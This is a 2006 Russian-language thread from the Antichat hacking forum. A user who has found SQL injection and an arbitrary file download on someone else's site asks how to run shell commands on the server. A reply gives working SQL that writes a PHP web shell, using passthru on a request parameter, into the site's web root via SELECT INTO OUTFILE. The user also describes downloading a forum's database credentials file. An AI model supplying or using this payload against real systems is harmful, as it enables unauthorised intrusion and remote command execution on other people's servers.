Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Шелл через SQL (https://forum.antichat.xyz/showthread.php?t=17203)

Utochka 06.04.2006 17:14
Шелл через SQL
 
Значит нашел сайт с sql инъекцией, составил запрос ошибок не возникает, но результат в браузер не выводиться. В чем тут может быть проблема?

Еще есть возможность скачивать ЛЮБЫЕ файлы с сервака с помощью кривого скрипта!!!! Скачать значит файл с настройками базы от форума IPB.

Скачал скрипт - rst.void.ru/download/sql.rar для коннекта к базе! Он успешно подсоединяеться, но опять же в браузере пусто!! ((

Помогите советом!

Utochka 06.04.2006 17:23
Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?

asm33 06.04.2006 20:29
так вроде бы KEZ видео делал. Выполнение команд посредством sql инъекции

m0nzt3r 27.04.2006 13:14
Цитата:
Сообщение от NeX
Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?
Для этого есть поиск.Вот код:
Код:
CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/полный/путь/к/сайту/шелл.php' FROM `shell`;
DROP TABLE `shell`;
Закрыта.


Время: 10:40